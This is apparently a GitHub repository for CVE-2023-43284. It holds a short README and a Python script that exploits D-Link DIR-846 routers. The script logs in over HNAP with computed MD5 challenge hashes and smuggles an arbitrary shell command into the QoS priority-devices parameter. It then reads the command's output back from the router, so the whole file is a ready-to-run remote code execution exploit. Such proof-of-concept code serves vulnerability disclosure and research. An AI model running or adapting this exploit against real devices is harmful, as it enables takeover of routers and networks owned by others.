├── README.md
├── dlink.py
└── exploit.png


/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2023-43284
 2 | DLink Model DIR-846 Authenticated Remote Code Execution.
 3 | 
 4 | This flaw abuse QoS POST parameter in the router to exploit an Authenticated Remote Code Execution. (Doesn't require QoS be enabled!)
 5 | 
 6 | ```
 7 |   -h, --help        show this help message and exit
 8 |   -x , --command    Command to be executed (Default: id)
 9 |   -p , --password   Password from router.
10 |   -i , --ip         IP from router. (Default: 192.168.0.1)
11 | ```
12 | ### Proof of Concept:
13 | ![Exploit](https://github.com/MateusTesser/CVE-2023-43284/blob/main/exploit.png?raw=true)
14 | 
15 | * Tested firmware version: 100A53DBR-Retail 
16 | 


--------------------------------------------------------------------------------
/dlink.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import sys
 3 | import hashlib
 4 | import json
 5 | import argparse
 6 | 
 7 | PROCESS = "\033[1;34;40m[*]\033[0m"
 8 | SUCCESS = "\033[1;32;40m[+]\033[0m"
 9 | FAIL = "\033[1;31;40m[-]\033[0m"
10 | 
11 | parser = argparse.ArgumentParser(prog="D-Link DIR-846 Authenticated Remote Code Execution", description="Exploits QoS to get Remote Code Execution",formatter_class=argparse.RawTextHelpFormatter,usage=f"python3 {sys.argv[0]} -x id -p 12345678")
12 | parser.add_argument("-x","--command",dest="command",type=str,default="id",help="Command to be executed (Default: id)",metavar='')
13 | parser.add_argument("-p","--password",dest="password",type=str,required=True,help="Password from router.",metavar='')
14 | parser.add_argument("-i","--ip",dest="ip",type=str,default="192.168.0.1",required=True,help="IP from router. (Default: 192.168.0.1)",metavar='')
15 | args = parser.parse_args()
16 | 
17 | if __name__ == "__main__":
18 |     if sys.argv[1]:
19 |         url = f"http://{args.ip}:80/HNAP1/"
20 |         cookies = {"PHPSESSID": "5c6805e3bb7bc8aa84db22198cfffd3e"}
21 |         headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "HNAP_AUTH": "350DE8309B07C7FE3C6A1FE7EEA5A286 1694632982454", "SOAPAction": "\"http://purenetworks.com/HNAP1/Login\"", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36", "Content-Type": "application/json; charset=UTF-8", "Origin": "http://192.168.0.1", "Referer": "http://192.168.0.1/Login.html?t=1694631564578", "Accept-Encoding": "gzip, deflate", "Accept-Language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"}
22 |         json1={"Login": {"Action": "request", "Captcha": "", "LoginPassword": "", "PrivateLogin": "LoginPassword", "Username": "admin"}}
23 |         r = requests.post(url, headers=headers, cookies=cookies, json=json1)
24 |         jason = json.loads(r.text)
25 | 
26 |         publickey = jason["LoginResponse"]["PublicKey"]
27 |         challenge = jason["LoginResponse"]["Challenge"]
28 |         cookies = jason["LoginResponse"]["Cookie"]
29 |         print(f"{PROCESS} Public key found:",publickey)
30 |         print(f"{PROCESS} Challenge found:",challenge)
31 | 
32 |         private_key = hashlib.md5()
33 |         private_key.update((publickey + args.password + challenge).encode())
34 | 
35 |         p_key = private_key.hexdigest().upper()
36 |         print(f"{SUCCESS} Private Key:",p_key)
37 |         loginpassword = hashlib.md5()
38 |         loginpassword.update( (p_key + challenge).encode())
39 |         print(f"{SUCCESS} Login password:",loginpassword.hexdigest().upper())
40 |         url = f"http://{args.ip}:80/HNAP1/"
41 |         cookies = {"PHPSESSID": "5c6805e3bb7bc8aa84db22198cfffd3e", "uid": str(cookies), "PrivateKey": str(p_key)}
42 |         headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "HNAP_AUTH": "0836650F3793B8253A1C8BC2AEEE0EE1 1694632982560", "SOAPAction": "\"http://purenetworks.com/HNAP1/Login\"", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36", "Content-Type": "application/json; charset=UTF-8", "Origin": "http://192.168.0.1", "Referer": "http://192.168.0.1/Login.html?t=1694631564578", "Accept-Encoding": "gzip, deflate", "Accept-Language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"}
43 |         json1={"Login": {"Action": "login", "Captcha": "", "LoginPassword": str(loginpassword.hexdigest().upper()), "PrivateLogin": "LoginPassword", "Username": "admin"}}
44 |         r=requests.post(url, headers=headers, cookies=cookies, json=json1)
45 |         jason = json.loads(r.text)
46 |         status = jason['LoginResponse']['LoginResult']
47 |         if status == 'OK':
48 |             print(f"{SUCCESS} Authenticated!")
49 |             url = f"http://{args.ip}:80/HNAP1/"
50 |             headers = {"Accept": "application/json", "HNAP_AUTH": "EAB96BAB693EDC254EBCBC2239C64ABB 1694628008533", "SOAPACTION": "\"http://purenetworks.com/HNAP1/SetSmartQoSSettings\"", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36", "Content-Type": "application/json", "Origin": "http://192.168.0.1", "Referer": "http://192.168.0.1/QoSControl.html?t=1694627737199", "Accept-Encoding": "gzip, deflate", "Accept-Language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"}
51 |             json1={"SetSmartQoSSettings": {"smartqos_downstream_shapingrate": "5459968", "smartqos_enable": "1", "smartqos_express_devices": "", "smartqos_normal_devices": "", "smartqos_priority_devices": f"$({args.command}>rce)", "smartqos_type": "by_device", "smartqos_upstream_shapingrate": "909312"}}
52 |             r=requests.post(url, headers=headers, cookies=cookies, json=json1)
53 |             jason = json.loads(r.text)
54 |             status = jason['SetSmartQoSSettingsResponse']['SetSmartQoSSettingsResult']
55 |             if status == 'OK':
56 |                 print(f"{SUCCESS} Exploited!")
57 |                 url = f"http://{args.ip}:80/HNAP1/rce"
58 |                 headers = {"Accept": "application/json", "HNAP_AUTH": "806EE8E7B21B3A334A7C536D497A7C03 1694396368304", "SOAPACTION": "\"http://purenetworks.com/HNAP1/SetNetworkTomographySettings\"", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36", "Content-Type": "application/json", "Origin": "http://192.168.0.1", "Referer": "http://192.168.0.1/Diagnosis.html", "Accept-Encoding": "gzip, deflate", "Accept-Language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7", "X-Forwaded-For": "8.8.8.8", "Connection": "close"}
59 |                 r=requests.get(url, headers=headers, cookies=cookies)
60 |                 print("OUTPUT>>\n\n"+r.text)
61 |             else:
62 |                 print(f"{FAIL} Failed!")
63 |         else:
64 |             print(f"{FAIL} Failed!")
65 | 


--------------------------------------------------------------------------------
/exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MateusTesser/CVE-2023-43284/b383870c4ca4775fcb00a36b835ed3b95f72f255/exploit.png


--------------------------------------------------------------------------------